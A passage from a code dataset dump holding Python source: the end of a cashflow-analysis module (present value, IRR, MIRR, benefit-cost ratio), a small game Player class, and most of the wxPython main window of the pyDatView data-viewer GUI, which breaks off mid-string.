(TimeSeries): Minimum atractive interest rate.\n base_date (int, tuple): Time.\n utility (function): utility function\n\n Returns:\n net value (float, list of floats)\n\n >>> marr = nominal_rate([12]*5)\n >>> cflo = cashflow([100]*5, spec = (0, -200))\n >>> timevalue(cflo, marr) # doctest: +ELLIPSIS\n 103.73...\n\n >>> timevalue(cflo, marr, 4) # doctest: +ELLIPSIS\n 163.22...\n\n >>> timevalue(cflo, marr, base_date=0, utility=exp_utility_fun(200)) # doctest: +ELLIPSIS\n -84.15...\n\n >>> timevalue(cflo, marr, base_date=0, utility=log_utility_fun(210)) # doctest: +ELLIPSIS\n 369092793...\n\n >>> timevalue(cflo, marr, base_date=0, utility=sqrt_utility_fun(210)) # doctest: +ELLIPSIS\n 2998.12...\n\n \"\"\"\n params = vars2list([cflo, marr, base_date])\n cflo = params[0]\n marr = params[1]\n base_date = params[2]\n retval = []\n for xcflo, xmarr, xbase_date in zip(cflo, marr, base_date):\n if not isinstance(xcflo, TimeSeries):\n raise TypeError(\"`cflo` must be a TimeSeries\")\n if not isinstance(xmarr, TimeSeries):\n raise TypeError(\"`marr` must be a TimeSeries\")\n verify_eq_time_range(xcflo, xmarr)\n netval = 0\n factor = to_discount_factor(xmarr, xbase_date)\n for time, _ in enumerate(xcflo):\n if utility is None:\n xcflo_aux = xcflo[time]\n else:\n xcflo_aux = utility(xcflo[time])\n netval += xcflo_aux * factor[time]\n if utility is not None:\n netval = utility(netval, inverse=True)\n retval.append(netval)\n if len(retval) == 1:\n return retval[0]\n return retval\n\n\ndef net_uniform_series(cflo, marr, nper=1):\n \"\"\"Computes a net uniform series equivalent of a cashflow.\n\n Args:\n cflo (cashflow): cashflow.\n marr (TimeSeries): Minimum atractive interest rate.\n nper (int, list): number of equivalent payment periods.\n\n Returns:\n net uniform series (float)\n\n \"\"\"\n params = vars2list([cflo, marr, nper])\n cflo = params[0]\n marr = params[1]\n nper = params[2]\n retval = []\n for xcflo, xmarr, xnper in zip(cflo, marr, nper):\n netval = timevalue(cflo=xcflo, marr=xmarr, base_date=0)\n erate = equivalent_nrate(xmarr)\n retval.append(-tvmm(nrate=erate, nper=xnper, pval=netval, fval=0, pmt=None))\n if len(retval) == 1:\n return retval[0]\n return retval\n\n\ndef benefit_cost_ratio(cflo, marr, base_date=0):\n \"\"\"\n Computes a benefit cost ratio at time `base_date` of a cashflow.\n\n Args:\n rate (int float, Rate): Minimum atractive interest rate.\n cashflow (cashflow, list): cashflow.\n base_date (int, list): Time.\n\n Returns:\n (float) net present value.\n\n \"\"\"\n\n params = vars2list([marr, cflo, base_date])\n marr = params[0]\n cflo = params[1]\n base_date = params[2]\n\n retval = []\n for xmarr, xcflo, xbase_date in zip(marr, cflo, base_date):\n verify_eq_time_range(xcflo, xmarr)\n num = 0\n den = 0\n num = xcflo.copy()\n den = xcflo.copy()\n for time, _ in enumerate(xcflo):\n if xcflo[time] >= 0.0:\n den[time] = 0\n else:\n num[time] = 0\n retval.append(-timevalue(num, xmarr, xbase_date) / timevalue(den, xmarr, xbase_date))\n\n if len(retval) == 1:\n return retval[0]\n return retval\n\n\n\ndef irr(cflo):\n \"\"\"Computes the internal rate of return.\n\n Args:\n cashflow (TimeSeries): cashflow.\n\n Returns:\n (float) net uniform series.\n\n \"\"\"\n if isinstance(cflo, TimeSeries):\n cflo = [cflo]\n retval = []\n for xcflo in cflo:\n retval.append(100 * xcflo.pyr * np.irr(xcflo.tolist()))\n if len(retval) == 1:\n return retval[0]\n return retval\n\n## modified internal rate of return\ndef mirr(cflo, finance_rate=0, reinvest_rate=0):\n \"\"\"Computes the modified internal rate of return.\n\n Args:\n cashflow (list, cashflow): cashflow.\n finance_rate (float): rate applied to negative values of the cashflow\n reinvest_rate (float): rate applied to positive values of the cashflow\n\n Returns:\n (float) modified internal rate of return.\n\n \"\"\"\n # negativos: finance_rate\n # positivos: reinvest_rate\n if isinstance(cflo, TimeSeries):\n cflo = [cflo]\n retval = []\n for xcflo in cflo:\n retval.append(100 * xcflo.pyr * np.mirr(xcflo.tolist(),\n finance_rate,\n reinvest_rate))\n\n if len(retval) == 1:\n return retval[0]\n return retval\n\ndef table(data):\n \"\"\"Prints the list `data` as a table\n\n Args:\n data:\n \"\"\"\n print(' # Value')\n print('------------------------')\n #\n data = [round(element, 4) for element in data]\n\n for index, _ in enumerate(data):\n print(' {:<3d} {:14.4f}'.format(index, data[index]))\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n","sub_path":"cashflows/gcashana.py","file_name":"gcashana.py","file_ext":"py","file_size_in_byte":8154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"389319378","text":"class Player:\n def __init__(self, player_name):\n self.player_name = player_name\n self.life_left = 5\n self.collected_money = 0\n self.start_time = 0\n self.time_spent = 0\n\n def did_you_die(self):\n self.life_left = self.life_left - 1\n if self.life_left == 0:\n return True\n else:\n return False\n\n def you_collected(self, how_much_collected):\n self.collected_money = self.collected_money + how_much_collected\n","sub_path":"class_of_player.py","file_name":"class_of_player.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"272624700","text":"from __future__ import division, unicode_literals, print_function, absolute_import\nfrom builtins import map, range, chr, str\nfrom io import open\nfrom future import standard_library\nstandard_library.install_aliases()\n\nimport numpy as np\nimport os.path \ntry:\n import pandas as pd\nexcept:\n print('')\n print('')\n print('Error: problem loading pandas package:')\n print(' - Check if this package is installed ( e.g. type: `pip install pandas`)')\n print(' - If you are using anaconda, try `conda update python.app`')\n print(' - If none of the above work, contact the developer.')\n print('')\n print('')\n sys.exit(-1)\n #raise\n\nimport sys\nimport traceback \nimport gc\n\n# GUI\nimport wx\nfrom .GUIPlotPanel import PlotPanel\nfrom .GUISelectionPanel import SelectionPanel,SEL_MODES,SEL_MODES_ID\nfrom .GUISelectionPanel import ColumnPopup,TablePopup\nfrom .GUIInfoPanel import InfoPanel\nfrom .Tables import Table, haveSameColumns\n# Helper\nfrom .common import *\nfrom .GUICommon import *\n\n\n\n# --------------------------------------------------------------------------------}\n# --- GLOBAL \n# --------------------------------------------------------------------------------{\nPROG_NAME='pyDatView'\nPROG_VERSION='v0.1-local'\ntry:\n import weio # File Formats and File Readers\n FILE_FORMATS= weio.fileFormats()\nexcept:\n print('')\n print('Error: the python package `weio` was not imported successfully.\\n')\n print('Most likely the submodule `weio` was not cloned with `pyDatView`')\n print('Type the following command to retrieve it:\\n')\n print(' git submodule update --init --recursive\\n')\n print('Alternatively re-clone this repository into a separate folder:\\n')\n print(' git clone --recurse-submodules https://github.com/ebranlard/pyDatView\\n')\n sys.exit(-1)\nFILE_FORMATS_EXTENSIONS = [['.*']]+[f.extensions for f in FILE_FORMATS]\nFILE_FORMATS_NAMES = ['auto (any supported file)'] + [f.name for f in FILE_FORMATS]\nFILE_FORMATS_NAMEXT =['{} ({})'.format(n,','.join(e)) for n,e in zip(FILE_FORMATS_NAMES,FILE_FORMATS_EXTENSIONS)]\nFILE_READER = weio.read\n\nSIDE_COL = [160,160,300,420]\nBOT_PANL =85\n\n#matplotlib.rcParams['text.usetex'] = False\n# matplotlib.rcParams['font.sans-serif'] = 'DejaVu Sans'\n#matplotlib.rcParams['font.family'] = 'Arial'\n#matplotlib.rcParams['font.sans-serif'] = 'Arial'\n# matplotlib.rcParams['font.family'] = 'sans-serif'\n\n\n\n\n\n# --------------------------------------------------------------------------------}\n# --- Drag and drop \n# --------------------------------------------------------------------------------{\n# Implement File Drop Target class\nclass FileDropTarget(wx.FileDropTarget):\n def __init__(self, parent):\n wx.FileDropTarget.__init__(self)\n self.parent = parent\n def OnDropFiles(self, x, y, filenames):\n filenames = [f for f in filenames if not os.path.isdir(f)]\n if len(filenames)>0:\n # If Ctrl is pressed we add\n bAdd= wx.GetKeyState(wx.WXK_CONTROL);\n iFormat=self.parent.comboFormats.GetSelection()\n if iFormat==0: # auto-format\n Format = None\n else:\n Format = FILE_FORMATS[iFormat-1]\n self.parent.load_files(filenames,fileformat=Format,bAdd=bAdd)\n return True\n\n\n\n\n# --------------------------------------------------------------------------------}\n# --- Main Frame \n# --------------------------------------------------------------------------------{\nclass MainFrame(wx.Frame):\n def __init__(self, filename=None):\n # Parent constructor\n wx.Frame.__init__(self, None, -1, PROG_NAME+' '+PROG_VERSION)\n # Data\n self.tabs=[]\n \n # Hooking exceptions to display them to the user\n sys.excepthook = MyExceptionHook\n # --- GUI\n #font = self.GetFont()\n #print(font.GetFamily(),font.GetStyle(),font.GetPointSize())\n #font.SetFamily(wx.FONTFAMILY_DEFAULT)\n #font.SetFamily(wx.FONTFAMILY_MODERN)\n #font.SetFamily(wx.FONTFAMILY_SWISS)\n #font.SetPointSize(8)\n #print(font.GetFamily(),font.GetStyle(),font.GetPointSize())\n #self.SetFont(font) \n # --- Menu\n menuBar = wx.MenuBar()\n\n fileMenu = wx.Menu()\n loadMenuItem = fileMenu.Append(wx.ID_NEW,\"Open file\" ,\"Open file\" )\n exptMenuItem = fileMenu.Append(-1 ,\"Export table\" ,\"Export table\" )\n saveMenuItem = fileMenu.Append(wx.ID_SAVE,\"Save figure\" ,\"Save figure\" )\n exitMenuItem = fileMenu.Append(wx.ID_EXIT, 'Quit', 'Quit application')\n menuBar.Append(fileMenu, \"&File\")\n self.Bind(wx.EVT_MENU,self.onExit ,exitMenuItem )\n self.Bind(wx.EVT_MENU,self.onLoad ,loadMenuItem )\n self.Bind(wx.EVT_MENU,self.onExport ,exptMenuItem )\n self.Bind(wx.EVT_MENU,self.onSave ,saveMenuItem )\n\n toolMenu = wx.Menu()\n dmpDecayMenuItem = toolMenu.Append(wx.ID_ANY, 'Damping from decay')\n menuBar.Append(toolMenu, \"&Tools\")\n self.Bind(wx.EVT_MENU,self.onDamping,dmpDecayMenuItem)\n\n helpMenu = wx.Menu()\n aboutMenuItem = helpMenu.Append(wx.NewId(), 'About', 'About')\n menuBar.Append(helpMenu, \"&Help\")\n self.SetMenuBar(menuBar)\n self.Bind(wx.EVT_MENU,self.onAbout,aboutMenuItem)\n\n # --- ToolBar\n tb = self.CreateToolBar(wx.TB_HORIZONTAL|wx.TB_TEXT|wx.TB_HORZ_LAYOUT)\n self.toolBar = tb \n self.comboFormats = wx.ComboBox(tb, choices = FILE_FORMATS_NAMEXT, style=wx.CB_READONLY) \n self.comboFormats.SetSelection(0)\n self.comboMode = wx.ComboBox(tb, choices = SEL_MODES, style=wx.CB_READONLY) \n self.comboMode.SetSelection(0)\n self.Bind(wx.EVT_COMBOBOX, self.onModeChange, self.comboMode )\n tb.AddSeparator()\n tb.AddControl( wx.StaticText(tb, -1, 'Mode: ' ) )\n tb.AddControl( self.comboMode ) \n tb.AddStretchableSpace()\n tb.AddControl( wx.StaticText(tb, -1, 'Format: ' ) )\n tb.AddControl(self.comboFormats ) \n tb.AddSeparator()\n #bmp = wx.Bitmap('help.png') #wx.Bitmap(\"NEW.BMP\", wx.BITMAP_TYPE_BMP) \n self.AddTBBitmapTool(tb,\"Open\" ,wx.ArtProvider.GetBitmap(wx.ART_FILE_OPEN),self.onLoad)\n self.AddTBBitmapTool(tb,\"Reload\",wx.ArtProvider.GetBitmap(wx.ART_REDO),self.onReload)\n try:\n self.AddTBBitmapTool(tb,\"Add\" ,wx.ArtProvider.GetBitmap(wx.ART_PLUS),self.onAdd)\n except:\n self.AddTBBitmapTool(tb,\"Add\" ,wx.ArtProvider.GetBitmap(wx.FILE_OPEN),self.onAdd)\n #self.AddTBBitmapTool(tb,\"Debug\" ,wx.ArtProvider.GetBitmap(wx.ART_ERROR),self.onAdd)\n tb.AddStretchableSpace()\n tb.Realize() \n\n # --- Status bar\n self.statusbar=self.CreateStatusBar(3, style=0)\n self.statusbar.SetStatusWidths([230, -1, 70])\n\n # --- Main Panel and Notebook\n self.MainPanel = wx.Panel(self)\n #self.MainPanel = wx.Panel(self, style=wx.RAISED_BORDER)\n #self.MainPanel.SetBackgroundColour((200,0,0))\n\n #self.nb = wx.Notebook(self.MainPanel)\n #self.nb.Bind(wx.EVT_NOTEBOOK_PAGE_CHANGED, self.on_tab_change)\n\n\n sizer = wx.BoxSizer()\n #sizer.Add(self.nb, 1, flag=wx.EXPAND)\n self.MainPanel.SetSizer(sizer)\n\n # --- Drag and drop\n dd = FileDropTarget(self)\n self.SetDropTarget(dd)\n\n # --- Main Frame (self)\n self.FrameSizer = wx.BoxSizer(wx.VERTICAL)\n slSep = wx.StaticLine(self, -1, size=wx.Size(-1,1), style=wx.LI_HORIZONTAL)\n self.FrameSizer.Add(slSep ,0, flag=wx.EXPAND|wx.BOTTOM,border=0)\n self.FrameSizer.Add(self.MainPanel,1, flag=wx.EXPAND,border=0)\n self.SetSizer(self.FrameSizer)\n\n self.SetSize((800, 600))\n self.Center()\n\n self.Show()\n\n def AddTBBitmapTool(self,tb,label,bitmap,callback=None,Type=None):\n \"\"\" Adding a toolbar tool, safe depending on interface\"\"\"\n # Modern API\n if Type is None or Type==0:\n try:\n tl = tb.AddTool( -1, bitmap=bitmap, label=label )\n if callback is not None:\n tb.Bind(wx.EVT_TOOL, callback, tl)\n return tl\n except:\n Type=None\n # Old fashion API\n if Type is None or Type==1:\n try:\n tl = tb.AddLabelTool( -1, bitmap=bitmap, label=label )\n if callback is not None:\n tb.Bind(wx.EVT_TOOL, callback, tl)\n return tl\n except:\n Type=None\n # Using a Bitmap \n if Type is None or Type==2:\n try:\n bt=wx.Button(tb,wx.ID_ANY, \" \"+label+\" \", style=wx.BU_EXACTFIT)\n bt.SetBitmapLabel(bitmap)\n tl=tb.AddControl(bt)\n if callback is not None:\n tb.Bind(wx.EVT_BUTTON, callback, bt)\n return tl\n except:\n Type=None\n # Last resort, we add a button only\n bt=wx.Button(tb,wx.ID_ANY, label)\n tl=tb.AddControl(bt)\n if callback is not None:\n tb.Bind(wx.EVT_BUTTON, callback, bt)\n return tl\n\n\n @property\n def filenames(self):\n filenames=[]\n if hasattr(self,'tabs'):\n for t in self.tabs:\n if t.filename not in filenames:\n filenames.append(t.filename)\n #filenames=[t.filename for t in self.tabs] \n return filenames\n\n def clean_memory(self,bReload=False):\n #print('Clean memory')\n # force Memory cleanup\n if hasattr(self,'tabs'):\n del self.tabs\n self.tabs=[]\n if not bReload:\n if hasattr(self,'selPanel'):\n self.selPanel.clean_memory()\n if hasattr(self,'infoPanel'):\n self.infoPanel.clean()\n if hasattr(self,'plotPanel'):\n self.plotPanel.cleanPlot()\n gc.collect()\n\n def load_files(self, filenames=[], fileformat=None, bReload=False, bAdd=False):\n \"\"\" load multiple files, only trigger the plot at the end \"\"\"\n if bReload:\n if hasattr(self,'selPanel'):\n self.selPanel.saveSelection()\n\n if not bAdd:\n self.clean_memory(bReload=bReload)\n\n tabs=[]\n for f in filenames:\n if f in self.filenames:\n Error(self,'Cannot add a file already opened')\n else:\n tabs += self._load_file_tabs(f,fileformat=fileformat)\n if len(tabs)>0:\n # Adding tables\n self.load_tabs(tabs,bReload=bReload,bAdd=bAdd,bPlot=True)\n\n def _load_file_tabs(self,filename,fileformat=None):\n \"\"\" load a single file, adds table, and potentially trigger plotting \"\"\"\n self.statusbar.SetStatusText('');\n self.statusbar.SetStatusText('',1);\n self.statusbar.SetStatusText('',2);\n print(fileformat)\n\n if not os.path.isfile(filename):\n Error(self,'File not found: '+filename)\n return []\n try:\n F = FILE_READER(filename,fileformat = fileformat)\n dfs = F.toDataFrame()\n except weio.FileNotFoundError as e:\n Error(self, 'A file was not found!\\n\\n While opening:\\n\\n {}\\n\\n the following file was not found:\\n\\n {}'.format(filename, e.filename))\n return []\n except IOError:\n Error(self, 'IO Error thrown while opening file: '+filename )\n return []\n except MemoryError:\n Error(self,'Insufficient memory!\\n\\nFile: '+filename+'\\n\\nTry closing and reopening the program, or use a 64 bit version of this program (i.e. of python).')\n return []\n except weio.EmptyFileError:\n Error(self,'File empty!\\n\\nFile is empty: '+filename+'\\n\\nOpen a different file.')\n return []\n except weio.FormatNotDetectedError:\n Error(self,'File format not detected!\\n\\nFile: '+filename+'\\n\\nUse an explicit file-format from the list')\n return []\n except weio.WrongFormatError as e:\n Error(self,'Wrong file format!\\n\\nFile: '+filename+'\\n\\n' \\\n 'The file parser for the selected format failed to open the file.\\n\\n'+ \\\n 'The reported error was:\\n'+e.args[0]+'\\n\\n' + \\\n 'Double-check your file format and report this error if you think it''s a bug.')\n return []\n except weio.BrokenFormatError as e:\n Error(self,'Inconsistency in the file format!\\n\\nFile: '+filename+'\\n\\n' \\\n 'The reported error was:\\n'+e.args[0]+'\\n\\n' + \\\n 'Double-check your file format and report this error if you think it''s a bug.')\n return []\n except:\n raise\n\n # Creating a list of tables\n tabs=[]\n if not isinstance(dfs,dict):\n if len(dfs)>0:\n tabs=[Table(df=dfs, name='default', filename=filename)]\n else:\n for k in list(dfs.keys()):\n if len(dfs[k])>0:\n tabs.append(Table(df=dfs[k], name=k, filename=filename))\n\n self.statusbar.SetStatusText(F.filename,1)\n if fileformat is None:\n self.statusbar.SetStatusText('Detected: '+F.formatName())\n else:\n self.statusbar.SetStatusText('Format: '+F.formatName())\n self.fileformatName = F.formatName()\n if len(tabs)<=0:\n Warn(self,'No dataframe found in file: '+filename)\n return []\n else:\n return tabs\n \n\n def load_df(self, df):\n tab=[Table(df=df, name='default')]\n self.load_tabs(tab)\n\n def load_tabs(self, tabs, bReload=False, bAdd=False, bPlot=True):\n if bAdd:\n if not hasattr(self,'selPanel'):\n bAdd=False\n\n if (not bReload) and (not bAdd):\n self.cleanGUI()\n\n if bAdd:\n self.tabs=self.tabs+tabs\n else:\n self.tabs=tabs\n ##\n if len(self.tabs)==1:\n self.statusbar.SetStatusText('{}x{}'.format(self.tabs[0].nCols,self.tabs[0].nRows),2)\n\n if bReload or bAdd:\n self.selPanel.update_tabs(self.tabs)\n else:\n #\n mode = SEL_MODES_ID[self.comboMode.GetSelection()]\n #self.vSplitter = wx.SplitterWindow(self.nb)\n self.vSplitter = wx.SplitterWindow(self.MainPanel)\n self.selPanel = SelectionPanel(self.vSplitter, self.tabs, mode=mode, mainframe=self)\n self.tSplitter = wx.SplitterWindow(self.vSplitter)\n #self.tSplitter.SetMinimumPaneSize(20)\n self.infoPanel = InfoPanel(self.tSplitter)\n self.plotPanel = PlotPanel(self.tSplitter, self.selPanel, self.infoPanel)\n self.tSplitter.SetSashGravity(0.9)\n self.tSplitter.SplitHorizontally(self.plotPanel, self.infoPanel)\n self.tSplitter.SetMinimumPaneSize(BOT_PANL)\n self.tSplitter.SetSashGravity(1)\n self.tSplitter.SetSashPosition(400)\n\n self.vSplitter.SplitVertically(self.selPanel, self.tSplitter)\n self.vSplitter.SetMinimumPaneSize(SIDE_COL[0])\n self.tSplitter.SetSashPosition(SIDE_COL[0])\n\n #self.nb.AddPage(self.vSplitter, \"Plot\")\n #self.nb.SendSizeEvent()\n\n sizer = self.MainPanel.GetSizer()\n sizer.Add(self.vSplitter, 1, flag=wx.EXPAND,border=0)\n self.MainPanel.SetSizer(sizer)\n self.FrameSizer.Layout()\n\n self.Bind(wx.EVT_COMBOBOX, self.onColSelectionChange, self.selPanel.colPanel1.comboX )\n self.Bind(wx.EVT_LISTBOX , self.onColSelectionChange, self.selPanel.colPanel1.lbColumns)\n self.Bind(wx.EVT_COMBOBOX, self.onColSelectionChange, self.selPanel.colPanel2.comboX )\n self.Bind(wx.EVT_LISTBOX , self.onColSelectionChange, self.selPanel.colPanel2.lbColumns)\n self.Bind(wx.EVT_LISTBOX , self.onTabSelectionChange, self.selPanel.tabPanel.lbTab)\n self.Bind(wx.EVT_SPLITTER_SASH_POS_CHANGED, self.onSashChangeMain, self.vSplitter)\n\n self.selPanel.tabPanel.lbTab.Bind(wx.EVT_RIGHT_DOWN, self.OnTabPopup)\n \n\n # plot trigger\n if bPlot:\n self.mainFrameUpdateLayout()\n self.onColSelectionChange(event=None)\n\n def renameTable(self, iTab, newName):\n oldName = self.tabs[iTab].name\n if newName in [t.name for t in self.tabs]:\n Error(self,'This table already exist, choose a different name.')\n return\n # Renaming table\n self.tabs[iTab].rename(newName)\n # Lowlevel update of GUI\n self.selPanel.renameTable(iTab, oldName, newName)\n\n def deleteTabs(self, I):\n # removing table slections\n # TODO TODO TODO self.selPanel.tabSelections[t.name]\n # \n self.tabs = [t for i,t in enumerate(self.tabs) if i not in I]\n\n # Invalidating selections\n self.selPanel.tabPanel.lbTab.SetSelection(-1)\n # Until we have something better, we empty plot\n self.plotPanel.empty()\n self.infoPanel.empty()\n self.selPanel.clean_memory()\n # Updating tables\n self.selPanel.update_tabs(self.tabs)\n # Trigger a replot\n self.onTabSelectionChange()\n\n def exportTab(self, iTab):\n default_filename=os.path.splitext(os.path.basename(self.tabs[iTab].filename))[0]+'.csv'\n with wx.FileDialog(self, \"Save to CSV file\",defaultFile=default_filename,\n style=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT) as dlg:\n #, wildcard=\"CSV files (*.csv)|*.csv\",\n dlg.CentreOnParent()\n if dlg.ShowModal() == wx.ID_CANCEL:\n return # the user changed their mind\n if isinstance(self.tabs[iTab].data, pd.DataFrame):\n try:\n self.tabs[iTab].data.to_csv(dlg.GetPath(),sep=',',index=False) #python3\n except:\n self.tabs[iTab].data.to_csv(dlg.GetPath(),sep=str(u',').encode('utf-8'),index=False) #python 2.\n else:\n raise NotImplementedError('Export of data that is not a dataframe')\n\n def onDamping(self, event=None):\n if not hasattr(self,'plotPanel'):\n Error(self,'Plot some data first')\n return\n self.plotPanel.showTool('LogDec')\n\n def onSashChangeMain(self,event=None):\n pass\n # doent work because size is not communicated yet\n #if hasattr(self,'selPanel'):\n # print('ON SASH')\n # self.selPanel.setEquiSash(event)\n\n def OnTabPopup(self,event):\n menu = TablePopup(self,self.selPanel.tabPanel.lbTab)\n self.PopupMenu(menu, event.GetPosition())\n menu.Destroy()\n\n def onTabSelectionChange(self,event=None):\n # TODO all this can go in TabPanel\n #print('Tab selection change')\n # Storing the previous selection \n #self.selPanel.printSelection()\n self.selPanel.saveSelection() # \n #self.selPanel.printSelection()\n ISel=self.selPanel.tabPanel.lbTab.GetSelections()\n if len(ISel)>0:\n if haveSameColumns(self.tabs,ISel):\n # Setting tab\n self.selPanel.setTabForCol(ISel[0],1) \n self.selPanel.colPanel2.empty()\n else:\n if self.selPanel._mode=='twoColumnsMode':\n if len(ISel)>2:\n Error(self,'In this mode, only two tables can be selected. To compare more than two tables, the tables need to have the same columns.')\n ISel=[ISel[0]]\n self.selPanel.tabPanel.lbTab.SetSelection(wx.NOT_FOUND)\n self.selPanel.tabPanel.lbTab.SetSelection(ISel[0])\n self.selPanel.setTabForCol(ISel[0],1) \n self.selPanel.colPanel2.empty()\n else: # two panels selected\n self.selPanel.setTabForCol(ISel[0],1) \n self.selPanel.setTabForCol(ISel[1],2) \n else:\n Error(self,'The two tables have different columns. Chose the \"two table mode\" to compare them.')\n # unselect all and select only the first one\n ISel=[ISel[0]]\n self.selPanel.tabPanel.lbTab.SetSelection(wx.NOT_FOUND)\n self.selPanel.tabPanel.lbTab.SetSelection(ISel[0])\n self.selPanel.setTabForCol(ISel[0],1) \n #print('>>>Updating tabSelected, from',self.selPanel.tabSelected,'to',self.selPanel.tabPanel.lbTab.GetSelections())\n self.selPanel.tabSelected=self.selPanel.tabPanel.lbTab.GetSelections()\n\n # Update of status bar\n self.statusbar.SetStatusText('',0)\n self.statusbar.SetStatusText(\", \".join([t.filename for (i,t) in enumerate(self.tabs) if i in ISel]),1)\n if len(ISel)==1:\n self.statusbar.SetStatusText('{}x{}'.format(self.tabs[ISel[0]].nCols,self.tabs[ISel[0]].nRows),2)\n else:\n self.statusbar.SetStatusText('',2)\n\n # Trigger the colSelection Event\n self.onColSelectionChange(event=None)\n\n def onColSelectionChange(self,event=None):\n if hasattr(self,'plotPanel'):\n if self.selPanel._mode=='twoColumnsMode':\n ISel=self.selPanel.tabPanel.lbTab.GetSelections()\n if haveSameColumns(self.tabs,ISel):\n pass # NOTE: this test is identical to onTabSelectionChange. Unification.\n elif len(ISel)==2:\n self.selPanel.colPanel1.forceOneSelection()\n self.selPanel.colPanel2.forceOneSelection()\n self.plotPanel.redraw()\n #print(self.tabs)\n # --- Stats trigger\n #self.showStats()\n\n def redraw(self):\n if hasattr(self,'plotPanel'):\n self.plotPanel.redraw()\n# def showStats(self):\n# self.infoPanel.showStats(self.plotPanel.plotData,self.plotPanel.pltTypePanel.plotType())\n\n def onExit(self, event):\n self.Close()\n\n def cleanGUI(self, event=None):\n if hasattr(self,'plotPanel'):\n del self.plotPanel\n if hasattr(self,'selPanel'):\n del self.selPanel\n if hasattr(self,'infoPanel'):\n del self.infoPanel\n #self.deletePages()\n try:\n self.MainPanel.GetSizer().Clear(delete_windows=True) # Delete Windows\n except:\n self.MainPanel.GetSizer().Clear()\n self.FrameSizer.Layout()\n gc.collect()\n\n def onSave(self, event=None):\n # using the navigation toolbar save functionality\n self.plotPanel.navTB.save_figure()\n\n def onAbout(self, event=None):\n Info(self,PROG_NAME+' '+PROG_VERSION+'\\n\\nWritten by E. Branlard. \\n\\nVisit http://github.com/ebranlard/pyDatView for documentation.')\n\n def onReload(self, event=None):\n filenames = self.filenames\n if len(filenames)>0:\n iFormat=self.comboFormats.GetSelection()\n if iFormat==0: # auto-format\n Format = None\n else:\n Format = FILE_FORMATS[iFormat-1]\n self.load_files(filenames,fileformat=Format,bReload=True,bAdd=False)\n else:\n Error(self,'Open one or more file first.')\n\n def onDEBUG(self, event=None):\n #self.clean_memory()\n self.plotPanel.ctrlPanel.Refresh()\n self.plotPanel.cb_sizer.ForceRefresh()\n\n def onExport(self, event=None):\n ISel=[]\n try:\n ISel = self.selPanel.tabPanel.lbTab.GetSelections()\n except:\n pass\n if len(ISel)>0:\n self.exportTab(ISel[0])\n else:\n Error(self,'Open a file and select a table first.')\n\n def onLoad(self, event=None):\n self.selectFile(bAdd=False)\n\n def onAdd(self, event=None):\n self.selectFile(bAdd=len(self.tabs)>0)\n\n def selectFile(self,bAdd=False):\n # --- File Format extension\n iFormat=self.comboFormats.GetSelection()\n sFormat=self.comboFormats.GetStringSelection()\n if iFormat==0: # auto-format\n Format = None\n #wildcard = 'all (*.*)|*.*'\n wildcard='|'.join([n+'|*'+';*'.join(e) for n,e in zip(FILE_FORMATS_NAMEXT,FILE_FORMATS_EXTENSIONS)])\n #wildcard = sFormat + extensions+'|all (*.*)|*.*'\n else:\n Format = FILE_FORMATS[iFormat-1]\n extensions = '|*'+';*'.join(FILE_FORMATS[iFormat-1].extensions)\n wildcard = sFormat + extensions+'|all (*.*)|*.*'\n\n with wx.FileDialog(self, \"Open file\", wildcard=wildcard,\n style=wx.FD_OPEN | wx.FD_FILE_MUST_EXIST | wx.FD_MULTIPLE) as dlg:\n #other options: wx.CHANGE_DIR\n #dlg.SetSize((100,100))\n #dlg.Center()\n if dlg.ShowModal() == wx.ID_CANCEL:\n return # the user changed their mind\n self.load_files(dlg.GetPaths(),fileformat=Format,bAdd=bAdd)\n\n\n def onModeChange(self, event=None):\n mode = SEL_MODES_ID[self.comboMode.GetSelection()]\n if hasattr(self,'selPanel'):\n self.selPanel.updateLayout(mode)\n self.mainFrameUpdateLayout()\n\n def mainFrameUpdateLayout(self, event=None):\n if hasattr(self,'selPanel'):\n nWind=self.selPanel.splitter.nWindows\n self.resizeSideColumn(SIDE_COL[nWind])\n\n\n # --- Side column\n def resizeSideColumn(self,width):\n # To force the replot we do an epic unsplit/split...\n #self.vSplitter.Unsplit()\n #self.vSplitter.SplitVertically(self.selPanel, self.tSplitter)\n self.vSplitter.SetMinimumPaneSize(width)\n self.vSplitter.SetSashPosition(width)\n #self.selPanel.splitter.setEquiSash()\n\n # --- NOTEBOOK \n #def deletePages(self):\n # for index in reversed(range(self.nb.GetPageCount())):\n # self.nb.DeletePage(index)\n # self.nb.SendSizeEvent()\n # gc.collect()\n #def on_tab_change(self, event=None):\n # page_to_select = event.GetSelection()\n # wx.CallAfter(self.fix_focus, page_to_select)\n # event.Skip(True)\n #def fix_focus(self, page_to_select):\n # page = self.nb.GetPage(page_to_select)\n # page.SetFocus()\n\n#----------------------------------------------------------------------\ndef MyExceptionHook(etype, value, trace):\n \"\"\"\n Handler for all unhandled exceptions.\n :param `etype`: the exception type (`SyntaxError`, `ZeroDivisionError`, etc...);\n :type `etype`: `Exception`\n :param string `value`: the exception error message;\n :param string `trace`: the traceback header, if any (otherwise, it prints the\n standard Python header: ``Traceback (most recent call last)``.\n \"\"\"\n # Printing exception\n traceback.print_exception(etype, value, trace)\n # Then showing to user the last error\n frame = wx.GetApp().GetTopWindow()\n tmp = traceback.format_exception(etype, value, trace)\n exception = 'The following exception occured:\\n\\n'+ tmp[-1] + '\\n'+tmp[-2].strip()\n Error(frame,exception)\n\n# --------------------------------------------------------------------------------}\n# --- Tests \n# --------------------------------------------------------------------------------{\ndef test(filenames=None):\n if filenames is not None:\n app = wx.App(False)\n frame = MainFrame()\n frame.load_files(filenames,fileformat=None)\n return\n \n# --------------------------------------------------------------------------------}\n# --- Mains \n# --------------------------------------------------------------------------------{\ndef showApp(dataframe=None,filenames=[]):\n \"\"\"\n The main function to start the data frame GUI.\n \"\"\"\n try:\n app = wx.App(False)\n except:\n print(\"MacOS Error:\")\n print(\" This program needs access to the screen. Please run with a\")\n print(\" Framework build of python, and only when you are logged in\")\n print(\" on the main display of your Mac.\")\n print(\"\")\n print(\"pyDatView help:\")\n print(\" You see the error above because you are using a Mac and \")\n print(\" the python executable you are using does not have access to\")\n print(\" your screen. This is a Mac issue, not a pyDatView issue.\")\n print(\" Instead of calling 'python pyDatView.py', you need to find\")\n print(\" another python and 